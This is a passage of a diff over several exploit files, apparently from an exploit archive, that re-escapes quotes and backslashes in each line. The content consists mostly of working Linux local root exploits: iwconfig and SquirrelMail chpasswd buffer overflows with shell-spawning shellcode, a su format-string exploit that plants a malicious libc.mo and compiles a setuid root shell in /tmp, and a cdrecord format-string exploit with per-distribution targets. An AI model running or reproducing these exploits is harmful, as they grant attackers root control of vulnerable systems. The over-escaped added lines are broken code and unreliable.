-   printf("use ret addr: 0x%x\n",ret);
+   printf(\"use ret addr: 0x%x\\n\",ret);
   memset(buf,0x41,sizeof(buf));
   memcpy(&buf[92],&ret,4);
--- a/platforms/linux/local/23300.c
+++ b/platforms/linux/local/23300.c
@ -15,18 +15,18 @@ A problem has been identified in the iwconfig program when handling strings on t
 #include <stdio.h>
-#define BIN     "/sbin/iwconfig"
+#define BIN     \"/sbin/iwconfig\"
 unsigned char shellcode[] =
-                  "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\xb0\x2e"
+                  \"\\x31\\xc0\\x31\\xdb\\xb0\\x17\\xcd\\x80\\x31\\xc0\\xb0\\x2e\"
-                  "\xcd\x80\x31\xc0\x53\x68\x77\x30\x30\x74\x89\xe3"
+                  \"\\xcd\\x80\\x31\\xc0\\x53\\x68\\x77\\x30\\x30\\x74\\x89\\xe3\"
-                  "\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x31\xc0"
+                  \"\\xb0\\x27\\xcd\\x80\\x31\\xc0\\xb0\\x3d\\xcd\\x80\\x31\\xc0\"
-                  "\x31\xdb\x31\xc9\xb1\x0a\x50\x68\x2e\x2e\x2f\x2f"
+                  \"\\x31\\xdb\\x31\\xc9\\xb1\\x0a\\x50\\x68\\x2e\\x2e\\x2f\\x2f\"
-                  "\xe2\xf9\x89\xe3\xb0\x0c\xcd\x80\x31\xc0\x31\xdb"
+                  \"\\xe2\\xf9\\x89\\xe3\\xb0\\x0c\\xcd\\x80\\x31\\xc0\\x31\\xdb\"
-                  "\x6a\x2e\x89\xe3\xb0\x3d\xcd\x80\x31\xc0\x31\xdb"
+                  \"\\x6a\\x2e\\x89\\xe3\\xb0\\x3d\\xcd\\x80\\x31\\xc0\\x31\\xdb\"
-                  "\x31\xc9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
+                  \"\\x31\\xc9\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\"
-                  "\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd"
+                  \"\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\x31\\xd2\\xb0\\x0b\\xcd\"
-                  "\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80";
+                  \"\\x80\\x31\\xc0\\x31\\xdb\\xb0\\x01\\xcd\\x80\";
 int
 main ()
@ -40,7 +40,7 @@ main ()
   *(add_ptr++)=ret_add;
   memset ((char *)out, 0x90, 1337);
   memcpy ((char *)out + 333, shellcode, strlen(shellcode));
-   memcpy((char *)out, "OUT=", 4);
+   memcpy((char *)out, \"OUT=\", 4);
   putenv(out);
   execl (BIN, BIN, buf, NULL);
   return 0;
--- a/platforms/linux/local/23301.c
+++ b/platforms/linux/local/23301.c
@ -21,7 +21,7 @@ A problem has been identified in the iwconfig program when handling strings on t
 */
 /*
- * Yet another Proof Of Concept Xploit for 'iwconfig'
+ * Yet another Proof Of Concept Xploit for \'iwconfig\'
 */
@ -32,8 +32,8 @@ A problem has been identified in the iwconfig program when handling strings on t
 #define RET 0xbffffc3f
 char shellcode[]=
-"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
+\"\\xeb\\x17\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\"
-"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";
+\"\\x4e\\x08\\x31\\xd2\\xcd\\x80\\xe8\\xe4\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x58\";
 int main(int argc,char **argv)
 {
@ -49,7 +49,7 @@ int main(int argc,char **argv)
  memcpy(buff+i,shellcode,strlen(shellcode));
-  execl("/sbin/iwconfig","iwconfig",buff,(char *)NULL);
+  execl(\"/sbin/iwconfig\",\"iwconfig\",buff,(char *)NULL);
  return 0;
 }
--- a/platforms/linux/local/249.c
+++ b/platforms/linux/local/249.c
@ -9,23 +9,23 @@
 #include <dirent.h>
 char *shellcode =
-"\x31\xc0\x83\xc0\x17\x31\xdb\xcd\x80\xeb"
+\"\\x31\\xc0\\x83\\xc0\\x17\\x31\\xdb\\xcd\\x80\\xeb\"
-"\x30\x5f\x31\xc9\x88\x4f\x17\x88\x4f\x1a"
+\"\\x30\\x5f\\x31\\xc9\\x88\\x4f\\x17\\x88\\x4f\\x1a\"
-"\x8d\x5f\x10\x89\x1f\x8d\x47\x18\x89\x47"
+\"\\x8d\\x5f\\x10\\x89\\x1f\\x8d\\x47\\x18\\x89\\x47\"
-"\x04\x8d\x47\x1b\x89\x47\x08\x31\xc0\x89"
+\"\\x04\\x8d\\x47\\x1b\\x89\\x47\\x08\\x31\\xc0\\x89\"
-"\x47\x0c\x8d\x0f\x8d\x57\x0c\x83\xc0\x0b"
+\"\\x47\\x0c\\x8d\\x0f\\x8d\\x57\\x0c\\x83\\xc0\\x0b\"
-"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8"
+\"\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\\x80\\xe8\"
-"\xcb\xff\xff\xff\x41\x41\x41\x41\x41\x41"
+\"\\xcb\\xff\\xff\\xff\\x41\\x41\\x41\\x41\\x41\\x41\"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
-"\x2f\x62\x69\x6e\x2f\x73\x68\x30\x2d\x63"
+\"\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x30\\x2d\\x63\"
-"\x30"
+\"\\x30\"
-"chown root /tmp/xp;chmod 4777 /tmp/xp";
+\"chown root /tmp/xp;chmod 4777 /tmp/xp\";
-char *LC_MESSAGES = "/tmp/LC_MESSAGES";
+char *LC_MESSAGES = \"/tmp/LC_MESSAGES\";
 int NOP_LEN = 12000;
-char *msgfmt = "/usr/bin/msgfmt";
+char *msgfmt = \"/usr/bin/msgfmt\";
-char *objdump = "/usr/bin/objdump";
+char *objdump = \"/usr/bin/objdump\";
 char *language = NULL;
 char *make_format_string(unsigned long, int, int);
@ -52,149 +52,149 @@ int main(int argc, char **argv)
  char randfile[1024];
  char *args2[2], opt;
-  printf("su exploit by XP <xp@xtreme-power.com>\n");
+  printf(\"su exploit by XP <xp@xtreme-power.com>\\n\");
-  printf("Enjoy!\n\n");
+  printf(\"Enjoy!\\n\\n\");
-  while ((opt = getopt(argc, argv, "o:n:m:O:e:l:")) != EOF)
+  while ((opt = getopt(argc, argv, \"o:n:m:O:e:l:\")) != EOF)
    switch(opt) {
-    case 'o':
+    case \'o\':
      offset = atoi(optarg);
      break;
-    case 'n':
+    case \'n\':
      NOP_LEN = atoi(optarg);
      break;
-    case 'm':
+    case \'m\':
      msgfmt = strdup(optarg);
      break;
-    case 'O':
+    case \'O\':
      objdump = strdup(optarg);
      break;
-    case 'e':
+    case \'e\':
-      sscanf(optarg, "%i:%i", &eat, &pad);
+      sscanf(optarg, \"%i:%i\", &eat, &pad);
      break;
-    case 'l':
+    case \'l\':
      language = (char*) malloc(40 + strlen(optarg));
      if (!language) {
-printf("malloc failed\naborting\n");
+printf(\"malloc failed\\naborting\\n\");
 exit(0);
      }
      memset(language, 0, 40 + strlen(optarg));
-      sprintf(language, "LANGUAGE=%s/../../../../../../tmp", optarg);
+      sprintf(language, \"LANGUAGE=%s/../../../../../../tmp\", optarg);
      break;
    default:
      exit(0);
    }
-  printf("Phase 1. Checking paths and write permisions\n");
+  printf(\"Phase 1. Checking paths and write permisions\\n\");
-  printf(" Checking for %s...", msgfmt);
+  printf(\" Checking for %s...\", msgfmt);
  checkfor(msgfmt);
-  printf(" Checking for %s...", objdump);
+  printf(\" Checking for %s...\", objdump);
  checkfor(objdump);
-  printf(" Checking write permisions on /tmp...");
+  printf(\" Checking write permisions on /tmp...\");
-  if (stat("/tmp", &st) < 0) {
+  if (stat(\"/tmp\", &st) < 0) {
-    printf("failed. cannot stat /tmp\naborting\n");
+    printf(\"failed. cannot stat /tmp\\naborting\\n\");
    exit(0);
  }
  if (!(st.st_mode & S_IWOTH)) {
-    printf("failed. /tmp it's not +w\naborting\n");
+    printf(\"failed. /tmp it\'s not +w\\naborting\\n\");
    exit(0);
  }
-  printf("Ok\n");
+  printf(\"Ok\\n\");
  fflush(stdout);
-  printf(" Checking read permisions on /bin/su...");
+  printf(\" Checking read permisions on /bin/su...\");
-  if (stat("/bin/su", &st) < 0) {
+  if (stat(\"/bin/su\", &st) < 0) {
-    printf("failed. cannot stat /bin/su\naborting\n");
+    printf(\"failed. cannot stat /bin/su\\naborting\\n\");
    exit(0);
  }
  if (!(st.st_mode & S_IROTH)) {
-    printf("failed. /bin/su it's not +r\naborting\n");
+    printf(\"failed. /bin/su it\'s not +r\\naborting\\n\");
    exit(0);
  }
-  printf("Ok\n");
+  printf(\"Ok\\n\");
  fflush(stdout);
  if (!language) {
-    printf(" Checking for a valid language...");
+    printf(\" Checking for a valid language...\");
    search_valid_language();
-    printf("Ok\n");
+    printf(\"Ok\\n\");
  }
-  printf(" Checking that %s does not exist...", LC_MESSAGES);
+  printf(\" Checking that %s does not exist...\", LC_MESSAGES);
  if (stat(LC_MESSAGES, &st) >= 0) {
-    printf("failed. %s exists\naborting\n", LC_MESSAGES);
+    printf(\"failed. %s exists\\naborting\\n\", LC_MESSAGES);
    exit(0);
  }
-  printf("Ok\n");
+  printf(\"Ok\\n\");
  fflush(stdout);
-  printf("Phase 2. Calculating eat and pad values\n ");
+  printf(\"Phase 2. Calculating eat and pad values\\n \");
  srand(time(NULL));
-  if (eat || pad) printf("skkiping, values set by user to eat = %i and
+  if (eat || pad) printf(\"skkiping, values set by user to eat = %i and
-pad = %i\n", eat, pad);
+pad = %i\\n\", eat, pad);
  else {
    calculate_eat_space(&eat, &pad);
-    printf("done\n eat = %i and pad = %i\n", eat, pad);
+    printf(\"done\\n eat = %i and pad = %i\\n\", eat, pad);
  }
  fflush(stdout);
  sh_addr -= offset;
-  printf("Phase 3. Creating evil libc.mo and setting enviroment
+  printf(\"Phase 3. Creating evil libc.mo and setting enviroment
-vars\n");
+vars\\n\");
  fflush(stdout);
  mkdir(LC_MESSAGES, 0755);
  chdir(LC_MESSAGES);
-  f = fopen("libc.po", "w+");
+  f = fopen(\"libc.po\", \"w+\");
  if (!f) {
-    perror("fopen()");
+    perror(\"fopen()\");
    exit(0);
  }
-  fprintf(f,"msgid \"%%s: invalid option -- %%c\\n\"\n");
+  fprintf(f,\"msgid \\\"%%s: invalid option -- %%c\\\\n\\\"\\n\");
-  fprintf(f,"msgstr \"%s\\n\"", make_format_string(sh_addr, eat, 0));
+  fprintf(f,\"msgstr \\\"%s\\\\n\\\"\", make_format_string(sh_addr, eat, 0));
  fclose(f);
-  sprintf(execbuf, "%s libc.po -o libc.mo; chmod 777 libc.mo", msgfmt);
+  sprintf(execbuf, \"%s libc.po -o libc.mo; chmod 777 libc.mo\", msgfmt);
  system(execbuf);
  nop_env = (char*) malloc(NOP_LEN + strlen(shellcode) + 1);
  if (!nop_env) {
-    printf("malloc failed\naborting\n");
+    printf(\"malloc failed\\naborting\\n\");
    exit(0);
  }
  memset(nop_env, 0x90, NOP_LEN + strlen(shellcode) + 1);
-  sprintf(&nop_env[NOP_LEN], "%s", shellcode);
+  sprintf(&nop_env[NOP_LEN], \"%s\", shellcode);
  env[0] = language;
  env[1] = NULL;
-  printf("Phase 4. Getting address of .dtors section of /bin/su\n ");
+  printf(\"Phase 4. Getting address of .dtors section of /bin/su\\n \");
  dtors_addr = get_dtors_addr();
-  printf("done\n .dtors is at 0x%08x\n", dtors_addr);
+  printf(\"done\\n .dtors is at 0x%08x\\n\", dtors_addr);
  fflush(stdout);
-  printf("Phase 5. Compiling suid shell\n");
+  printf(\"Phase 5. Compiling suid shell\\n\");
  fflush(stdout);
  make_suid_shell();
-  printf("Phase 6. Executing /bin/su\n");
+  printf(\"Phase 6. Executing /bin/su\\n\");
  fflush(stdout);
-  args[0] = "/bin/su";
+  args[0] = \"/bin/su\";
-  args[1] = "-";
+  args[1] = \"-\";
  args[2] = make_ret_str(dtors_addr, pad);
-  args[3] = "-w";
+  args[3] = \"-w\";
  args[4] = nop_env;
  args[5] = NULL;
-  sprintf(randfile, "/tmp/tmprand%i", rand());
+  sprintf(randfile, \"/tmp/tmprand%i\", rand());
  if (!(pid = fork())) {
    close(1);
@ -203,11 +203,11 @@ vars\n");
    dup2(fd, 1);
    dup2(fd, 2);
    execve(args[0], args, env);
-    printf("failed to exec /bin/su\n"); exit(0);
+    printf(\"failed to exec /bin/su\\n\"); exit(0);
  }
  if (pid < 0) {
-    perror("fork()");
+    perror(\"fork()\");
    exit(0);
  }
@ -215,32 +215,32 @@ vars\n");
  unlink(randfile);
-  stat("/tmp/xp", &st);
+  stat(\"/tmp/xp\", &st);
  if (!(S_ISUID & st.st_mode)) {
-    printf("failed to put mode 4777 to /tmp/xp\naborting\n");
+    printf(\"failed to put mode 4777 to /tmp/xp\\naborting\\n\");
    exit(0);
  }
-  printf(" - Entering rootshell ;-) -\n");
+  printf(\" - Entering rootshell ;-) -\\n\");
  fflush(stdout);
  if (!(pid = fork())) {
-    args2[0] = "/tmp/xp";
+    args2[0] = \"/tmp/xp\";
    args2[1] = NULL;
    execve(args2[0], args2, NULL);
-    printf("failed to exec /tmp/xp\n");
+    printf(\"failed to exec /tmp/xp\\n\");
    exit(0);
  }
  if (pid < 0) {
-    perror("fork()");
+    perror(\"fork()\");
    exit(0);
  }
  waitpid(pid, &c, 0);
-  printf("Phase 7. Cleaning enviroment\n");
+  printf(\"Phase 7. Cleaning enviroment\\n\");
-  sprintf(execbuf, "rm -rf %s /tmp/xp", LC_MESSAGES);
+  sprintf(execbuf, \"rm -rf %s /tmp/xp\", LC_MESSAGES);
  system(execbuf);
 }
@ -254,17 +254,17 @@ char *make_format_string(unsigned long sh_addr, int eat, int test)
  memset(ret, 0, 0xffff);
-  for (c = 0; c < eat; c++) strcat(ret, "%8x");
+  for (c = 0; c < eat; c++) strcat(ret, \"%8x\");
  waste = 8 * eat;
  hi = (sh_addr & 0xffff0000) >> 16;
  lo = (sh_addr & 0xffff) - hi;
  if (!test) {
-    sprintf(&ret[strlen(ret)], "%%0%ux%%hn", hi-waste);
+    sprintf(&ret[strlen(ret)], \"%%0%ux%%hn\", hi-waste);
-    sprintf(&ret[strlen(ret)], "%%0%ux%%hn", lo);
+    sprintf(&ret[strlen(ret)], \"%%0%ux%%hn\", lo);
  }
-  else strcat(ret, "%8x *0x%08x* %8x *0x%08x*");
+  else strcat(ret, \"%8x *0x%08x* %8x *0x%08x*\");
  return ret;
 }
@ -276,22 +276,22 @@ unsigned long get_dtors_addr()
  FILE *f;
  unsigned long ret = 0, tmp1, tmp2, tmp3;
-  sprintf(file, "/tmp/tmprand%i", rand());
+  sprintf(file, \"/tmp/tmprand%i\", rand());
-  sprintf(exec_buf, "%s -h /bin/su > %s", objdump, file);
+  sprintf(exec_buf, \"%s -h /bin/su > %s\", objdump, file);
  system(exec_buf);
-  f = fopen(file, "r");
+  f = fopen(file, \"r\");
  if (!f) {
-    perror("fopen()");
+    perror(\"fopen()\");
    exit(0);
  }
  while (!feof(f)) {
    fgets(buf, 1024, f);
-    sscanf(buf, " %i .%s %x %x \n", &tmp1, sect, &tmp2, &tmp3);
+    sscanf(buf, \" %i .%s %x %x \\n\", &tmp1, sect, &tmp2, &tmp3);
-    printf("."); fflush(stdout);
+    printf(\".\"); fflush(stdout);
-    if (strcmp(sect, "dtors")) continue;
+    if (strcmp(sect, \"dtors\")) continue;
    ret = tmp3;
    break;
  }
@ -299,7 +299,7 @@ unsigned long get_dtors_addr()
  unlink(file);
  if (!ret) {
-    printf("error getting the address of .dtors\naborting");
+    printf(\"error getting the address of .dtors\\naborting\");
    exit(0);
  }
@ -344,41 +344,41 @@ void calculate_eat_space(int *eatr, int *padr)
  char *readbuf = NULL, *token;
  unsigned long t1, t2;
-  tmpfile[0] = '\0';
+  tmpfile[0] = \'\\0\';
  nop_env = (char*) malloc(NOP_LEN + strlen(shellcode) + 1);
  if (!nop_env) {
-    printf("malloc failed\naborting\n");
+    printf(\"malloc failed\\naborting\\n\");
    exit(0);
  }
  memset(nop_env, 0x90, NOP_LEN + strlen(shellcode) + 1);
-  sprintf(&nop_env[NOP_LEN], "%s", shellcode);
+  sprintf(&nop_env[NOP_LEN], \"%s\", shellcode);
  for (eat = 50; eat < 200; eat++) {
    for (pad = 0; pad < 4; pad++) {
      if (tmpfile[0]) unlink(tmpfile);
-      chdir("/");
+      chdir(\"/\");
-      sprintf(execbuf, "rm -rf %s", LC_MESSAGES);
+      sprintf(execbuf, \"rm -rf %s\", LC_MESSAGES);
      system(execbuf);
      mkdir(LC_MESSAGES, 0755);
      chdir(LC_MESSAGES);
-      f = fopen("libc.po", "w+");
+      f = fopen(\"libc.po\", \"w+\");
      if (!f) {
-perror("fopen()");
+perror(\"fopen()\");
 exit(0);
      }
-      fprintf(f,"msgid \"%%s: invalid option -- %%c\\n\"\n");
+      fprintf(f,\"msgid \\\"%%s: invalid option -- %%c\\\\n\\\"\\n\");
-      fprintf(f,"msgstr \"%s\\n\"", make_format_string(0xbfffffbb, eat,
+      fprintf(f,\"msgstr \\\"%s\\\\n\\\"\", make_format_string(0xbfffffbb, eat,
 1));
      fclose(f);
-      sprintf(execbuf, "chmod 777 libc.po; %s libc.po -o libc.mo",
+      sprintf(execbuf, \"chmod 777 libc.po; %s libc.po -o libc.mo\",
 msgfmt);
      system(execbuf);
@ -396,10 +396,10 @@ dup2(fds[1], 2);
 env[0] = language;
 env[1] = NULL;
-args[0] = "/bin/su";
+args[0] = \"/bin/su\";
-args[1] = "-";
+args[1] = \"-\";
 args[2] = make_ret_str(test_value, pad);
-args[3] = "-w";
+args[3] = \"-w\";
 args[4] = nop_env;
 args[5] = NULL;
@ -407,16 +407,16 @@ execve(args[0], args, env);
      }
      if (pid < 0) {
-perror("fork()");
+perror(\"fork()\");
 exit(0);
      }
      close(fds[1]);
-      sprintf(tmpfile, "/tmp/tmprand%i", rand());
+      sprintf(tmpfile, \"/tmp/tmprand%i\", rand());
      tmpfd = open(tmpfile, O_RDWR | O_CREAT);
      if (tmpfd < 0) {
-perror("open()");
+perror(\"open()\");
 exit(0);
      }
      while ((l = read(fds[0], buf, 1024)) > 0)
@ -429,16 +429,16 @@ write(tmpfd, buf, l);
      chmod(tmpfile, 0777);
-      f = fopen(tmpfile, "r");
+      f = fopen(tmpfile, \"r\");
      if (!f) {
-perror("fopen()");
+perror(\"fopen()\");
 exit(0);
      }
      if (readbuf) free(readbuf);
      readbuf = (char*) malloc(st.st_size);
      if (!readbuf) {
-printf("malloc failed\naborting\n");
+printf(\"malloc failed\\naborting\\n\");
 exit(0);
      }
@ -447,15 +447,15 @@ exit(0);
      fread(readbuf, 1, st.st_size, f);
      fclose(f);
-      token = strtok(readbuf, "*");
+      token = strtok(readbuf, \"*\");
      if (!token) continue;
-      token = strtok(NULL, "*");
+      token = strtok(NULL, \"*\");
      if (!token) continue;
      t1 = strtoul(token, NULL, 16);
-      token = strtok(NULL, "*");
+      token = strtok(NULL, \"*\");
      if (!token) continue;
-      token = strtok(NULL, "*");
+      token = strtok(NULL, \"*\");
      if (!token) continue;
      t2 = strtoul(token, NULL, 16);
@ -463,7 +463,7 @@ exit(0);
 if (t1 == (test_value+2)) {
  *eatr = eat;
  *padr = pad;
-  sprintf(execbuf, "rm -rf %s", LC_MESSAGES);
+  sprintf(execbuf, \"rm -rf %s\", LC_MESSAGES);
  system(execbuf);
  if (tmpfile[0]) unlink(tmpfile);
  return;
@ -471,16 +471,16 @@ if (t1 == (test_value+2)) {
      // sleep(10);
    }
-    printf(".");
+    printf(\".\");
    fflush(stdout);
  }
  if (tmpfile[0]) unlink(tmpfile);
-  sprintf(execbuf, "rm -rf %s", LC_MESSAGES);
+  sprintf(execbuf, \"rm -rf %s\", LC_MESSAGES);
  system(execbuf);
-  printf("failed to calculate eat and pad values. glibc patched or
+  printf(\"failed to calculate eat and pad values. glibc patched or
-invalid language?\naborting\n");
+invalid language?\\naborting\\n\");
  exit(0);
 }
@ -489,11 +489,11 @@ void checkfor(char *p)
  int fd;
  fd = open(p, O_RDONLY);
  if (fd < 0) {
-    printf("failed\naborting\n");
+    printf(\"failed\\naborting\\n\");
    exit(0);
  }
  close(fd);
-  printf("Ok\n");
+  printf(\"Ok\\n\");
  fflush(stdout);
 }
@ -502,30 +502,30 @@ void make_suid_shell()
  FILE *f;
  char execbuf[1024];
-  f = fopen("/tmp/kidd0.c", "w");
+  f = fopen(\"/tmp/kidd0.c\", \"w\");
  if (!f) {
-    printf(" failed to create /tmp/kidd0.c\naborting\n");
+    printf(\" failed to create /tmp/kidd0.c\\naborting\\n\");
    exit(0);
  }
-  fprintf(f, "int main() { setuid(0); setgid(0); system(\"/bin/sh\");
+  fprintf(f, \"int main() { setuid(0); setgid(0); system(\\\"/bin/sh\\\");
-}");
+}\");
  fclose(f);
-  sprintf(execbuf, "gcc /tmp/kidd0.c -o /tmp/xp");
+  sprintf(execbuf, \"gcc /tmp/kidd0.c -o /tmp/xp\");
  system(execbuf);
-  sprintf(execbuf, "rm -f /tmp/kidd0.c");
+  sprintf(execbuf, \"rm -f /tmp/kidd0.c\");
  system(execbuf);
-  f = fopen("/tmp/xp", "r");
+  f = fopen(\"/tmp/xp\", \"r\");
  if (!f) {
-    printf(" failed to compile /tmp/kidd0.c\naborting\n");
+    printf(\" failed to compile /tmp/kidd0.c\\naborting\\n\");
    exit(0);
  }
  fclose(f);
-  printf(" /tmp/xp created Ok\n");
+  printf(\" /tmp/xp created Ok\\n\");
  fflush(stdout);
 }
@ -534,30 +534,30 @@ void search_valid_language()
  DIR *locale;
  struct dirent *dentry;
-  locale = opendir("/usr/share/locale");
+  locale = opendir(\"/usr/share/locale\");
  if (!locale) {
-    perror("failed to opendir /usr/share/locale");
+    perror(\"failed to opendir /usr/share/locale\");
-    printf("aborting\n");
+    printf(\"aborting\\n\");
    exit(0);
  }
  while (dentry = readdir(locale)) {
-    if (!strchr(dentry->d_name, '_')) continue;
+    if (!strchr(dentry->d_name, \'_\')) continue;
    language = (char*) malloc(40 + strlen(dentry->d_name));
    if (!language) {
-      printf("malloc failed\naborting\n");
+      printf(\"malloc failed\\naborting\\n\");
      exit(0);
    }
    memset(language, 0, 40 + strlen(dentry->d_name));
-    sprintf(language, "LANGUAGE=%s/../../../../../../tmp",dentry->d_name);
+    sprintf(language, \"LANGUAGE=%s/../../../../../../tmp\",dentry->d_name);
    closedir(locale);
-    printf(" [using %s] ", dentry->d_name);
+    printf(\" [using %s] \", dentry->d_name);
    return;
  }
-  printf("failed to find a valid language\naborting\n");
+  printf(\"failed to find a valid language\\naborting\\n\");
  exit(0);
 }
--- a/platforms/linux/local/273.c
+++ b/platforms/linux/local/273.c
@ -15,10 +15,10 @@
 #include <stdlib.h>
 char shellcode[]=
-"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
+\"\\x31\\xc0\\xb0\\x46\\x31\\xdb\\x31\\xc9\\xcd\\x80\\xeb\\x16\\x5b\\x31\\xc0\"
-"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
+\"\\x88\\x43\\x07\\x89\\x5b\\x08\\x89\\x43\\x0c\\xb0\\x0b\\x8d\\x4b\\x08\\x8d\"
-"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
+\"\\x53\\x0c\\xcd\\x80\\xe8\\xe5\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\"
-"\x68";
+\"\\x68\";
 int main(int argc, char *argv[])
 {
@ -29,16 +29,16 @@ char *buffer, *ptr;
 buffer = malloc(200);
-printf("\n*** Squirremail chpasswd local root exploit by 0x3142@hushmail.com ***\n\n");
+printf(\"\\n*** Squirremail chpasswd local root exploit by 0x3142@hushmail.com ***\\n\\n\");
 if(argc != 2) {
-printf("Usage: %s <path-to-chpasswd>\n\n",argv[0]);
+printf(\"Usage: %s <path-to-chpasswd>\\n\\n\",argv[0]);
 exit(0);
 }
 ret = 0xbffffffa - strlen(shellcode) - strlen(argv[1]);
-// printf("Using ret = 0x%x\n\n", ret);
+// printf(\"Using ret = 0x%x\\n\\n\", ret);
 ptr = buffer;
 addr_ptr = (long *) ptr;
@ -49,7 +49,7 @@ for(i=0; i < 200; i+=4)
 buffer[200-1] = 0;
-execle(argv[1], "chpasswd", buffer, "0x314", "m0s", 0, env);
+execle(argv[1], \"chpasswd\", buffer, \"0x314\", \"m0s\", 0, env);
 free(buffer);
--- a/platforms/linux/local/31.pl
+++ b/platforms/linux/local/31.pl
@ -9,25 +9,25 @@
 #   Cdrecord 2.0 (i586-mandrake-linux-gnu)
 #
 #   scsibus: -1 target: -1 lun: -1
-#   Warning: Open by 'devname' is unintentional and not supported.
+#   Warning: Open by \'devname\' is unintentional and not supported.
-#   /usr/bin/cdrecord: No such file or directory. Cannot open '. Cannot open SCSI driver.
+#   /usr/bin/cdrecord: No such file or directory. Cannot open \'. Cannot open SCSI driver.
-#   /usr/bin/cdrecord: For possible targets try 'cdrecord -scanbus'. Make sure you are root.
+#   /usr/bin/cdrecord: For possible targets try \'cdrecord -scanbus\'. Make sure you are root.
-#   /usr/bin/cdrecord: For possible transport specifiers try 'cdrecord dev=help'.
+#   /usr/bin/cdrecord: For possible transport specifiers try \'cdrecord dev=help\'.
 #   sh-2.05b# id
 #   uid=0(root) gid=0(root) groups=503(wsxz)
 #   sh-2.05b#
 #####################################################
 		    $shellcode =
-                    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80".#setuid 0
+                    \"\\x31\\xc0\\x31\\xdb\\xb0\\x17\\xcd\\x80\".#setuid 0
-		    "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80".#setgid 0
+		    \"\\x31\\xdb\\x89\\xd8\\xb0\\x2e\\xcd\\x80\".#setgid 0
-		    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89".
+		    \"\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\".
-                    "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c".
+                    \"\\x46\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\".
-                    "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
+                    \"\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\\x80\\xe8\\xdc\\xff\".
-                    "\xff\xff/bin/sh";
+                    \"\\xff\\xff/bin/sh\";
-		    $cdrecordpath = "/usr/bin/cdrecord";
+		    $cdrecordpath = \"/usr/bin/cdrecord\";
-		    $nop = "\x90"; # x86 NOP
+		    $nop = \"\\x90\"; # x86 NOP
                    $offset = 0; # Default offset to try.
@ -35,45 +35,45 @@
                    $target = $ARGV[0];
                    $offset = $ARGV[1];
 		    }else{
-		    printf(" Priv8security.com Cdrecord local root exploit!!\n");
+		    printf(\" Priv8security.com Cdrecord local root exploit!!\\n\");
-		    printf(" usage: $0 target\n");
+		    printf(\" usage: $0 target\\n\");
-		    printf(" List of targets:\n");
+		    printf(\" List of targets:\\n\");
-		    printf("      1 - Linux Mandrake 8.2 Cdrecord 1.11a15\n");
+		    printf(\"      1 - Linux Mandrake 8.2 Cdrecord 1.11a15\\n\");
-                    printf("      2 - Linux Mandrake 9.0 Cdrecord 1.11a32\n");
+                    printf(\"      2 - Linux Mandrake 9.0 Cdrecord 1.11a32\\n\");
-                    printf("      3 - Linux Slackware 8.1 Cdrecord 1.11a24 not suid by default!!!\n");
+                    printf(\"      3 - Linux Slackware 8.1 Cdrecord 1.11a24 not suid by default!!!\\n\");
-		    printf("      4 - Linux Mandrake 9.1 Cdrecord 2.0\n");
+		    printf(\"      4 - Linux Mandrake 9.1 Cdrecord 2.0\\n\");
 		    exit(1);
 		    }
-     if ( $target eq "1" ) {
+     if ( $target eq \"1\" ) {
                   $retword = 0x0807af38; #Mr  .dtors ;)
-		   $fmtstring = "%.134727238x%x%x%x%x%x%x%x%x%n:";
+		   $fmtstring = \"%.134727238x%x%x%x%x%x%x%x%x%n:\";
 		    }
-     if ( $target eq "2" ) {
+     if ( $target eq \"2\" ) {
                  # $retword = 0x08084578; #.dtors
                   $retword = 0x08084684; #.GOT exit
-		   $fmtstring = "%.134769064x%x%x%x%x%x%x%x%x%n:";
+		   $fmtstring = \"%.134769064x%x%x%x%x%x%x%x%x%n:\";
 		    }
-      if ( $target eq "3" ) {
+      if ( $target eq \"3\" ) {
                   $retword = 0x0807f658;
-                   $fmtstring =  "%.134745456x%x%x%x%x%x%x%x%x%x%x%n:";
+                   $fmtstring =  \"%.134745456x%x%x%x%x%x%x%x%x%x%x%n:\";
 		    }
-       if ( $target eq "4" ) {
+       if ( $target eq \"4\" ) {
                   $retword = 0x0808c82c; #.GOT exit
-		   $fmtstring = "%.134802669x%x%x%x%x%x%x%x%x%n:";
+		   $fmtstring = \"%.134802669x%x%x%x%x%x%x%x%x%n:\";
 		    }
-		    printf("Using target number %d\n", $target);
+		    printf(\"Using target number %d\\n\", $target);
-                    printf("Using Mr .dtors 0x%x\n",$retword);
+                    printf(\"Using Mr .dtors 0x%x\\n\",$retword);
